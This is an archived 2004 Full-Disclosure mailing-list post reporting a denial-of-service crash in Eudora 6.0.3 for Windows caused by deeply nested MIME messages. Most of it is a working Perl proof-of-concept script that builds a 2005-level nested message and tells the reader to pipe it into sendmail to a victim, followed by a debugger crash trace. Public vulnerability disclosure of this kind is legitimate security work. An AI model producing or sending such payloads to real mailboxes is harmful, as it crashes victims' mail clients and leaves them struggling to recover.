[Full-Disclosure] Eudora 6.0.3 nested MIME DoS

From: Paul Szabo (psz_at_maths.usyd.edu.au)
Date: 04/14/04

  • Next message: Thomas: "Re: [Full-Disclosure] Cisco LEAP exploit tool..."
    To: NTBugtraq@listserv.ntbugtraq.com, beckley@qualcomm.com, bugtraq@securityfocus.com, full-disclosure@lists.netsys.com
    Date: Wed, 14 Apr 2004 13:12:23 +1000 (EST)
    
    

    Eudora 6.0.3 for Windows will crash if sent a MIME message nested more than
    2000 levels deep. Due to the presence of the [EudoraDir]\spool\*.RCV file,
    users may find it difficult to recover from this DoS situation. Demo below.

    Cheers,

    Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
    School of Mathematics and Statistics University of Sydney 2006 Australia

    #!/usr/bin/perl --

    print "From: me\n";
    print "To: you\n";
    print "Subject: nested multipart test\n";
    print "Mime-Version: 1.0\n";
    print "X-Use: Pipe the output of this script into: sendmail -i victim\n";

    &nest(0);
    print "\n";

    sub nest {
      my ($x) = @_;
      my $b = sprintf("bndry%04d",$x);
      print "Content-Type: multipart/mixed; boundary=\"$b\"\n\n";
      print "--$b\n";
      print "Content-Type: text/plain\n\n";
      print "Level $x\n\n";

    # No problem for 1995, but crash for 2005 deep nesting:
    #
    # (378.1c4): Stack overflow - code c00000fd (first chance)
    # First chance exceptions are reported before any exception handling.
    # This exception may be expected and handled.
    # eax=00000409 ebx=00000001 ecx=00000000 edx=00000001 esi=000338a8 edi=62000000
    # eip=77f862ed esp=00032f10 ebp=000337b0 iopl=0 nv up ei pl nz na pe nc
    # cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010202
    # ntdll!LdrLoadAlternateResourceModule+9:
    # 77f862ed 53 push ebx

      if ($x < 2005) {
        print "--$b\n";
        &nest($x+1);
      }
      print "--$b\n";
      print "Content-Type: text/plain\n\n";
      print "Final $x\n";
      print "--$b--\n\n";
    }

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Thomas: "Re: [Full-Disclosure] Cisco LEAP exploit tool..."

    Relevant Pages

    • Eudora 6.0.3 nested MIME DoS
      ... Eudora 6.0.3 for Windows will crash if sent a MIME message nested more than ... 2000 levels deep. ... Due to the presence of the \spool\*.RCV file, ... # First chance exceptions are reported before any exception handling. ...
      (NT-Bugtraq)
    • Re: SetUnhandledExceptionFilter
      ... The only way to prevent at all cost a crash in the applicaiton ... Looking at a full dump of Word.exe and/or LotusNotes is the only way ... A bad heap metadata will cause an access violation, ... normally dismissed in some wide exception handler) ...
      (microsoft.public.win32.programmer.kernel)
    • Re: Event ID 7031 Exchange 2003
      ... I could not find any exceptions in the crashdump file. ... It seems like the information store crash is "silent" with no other error ... What is the process that had the exception. ...
      (microsoft.public.exchange2000.information.store)
    • Re: Standby-Sleep Problem
      ... If your driver does not explicitly show up in the crash dump, then it does not mean that the crash is not your driver's fault. ... If you cannot attach a debugger, then you will not be successful in developing your driver. ... Break instruction exception - code 80000003 ...
      (microsoft.public.development.device.drivers)
    • Re: Checking for null parameter
      ... Would you say that an exception can occur in the body of printLine? ... you could have made printLength() private. ... It does not crash if *and only if* called from the mainyou show. ... If you document that it might throw an NPE, ...
      (comp.lang.java.programmer)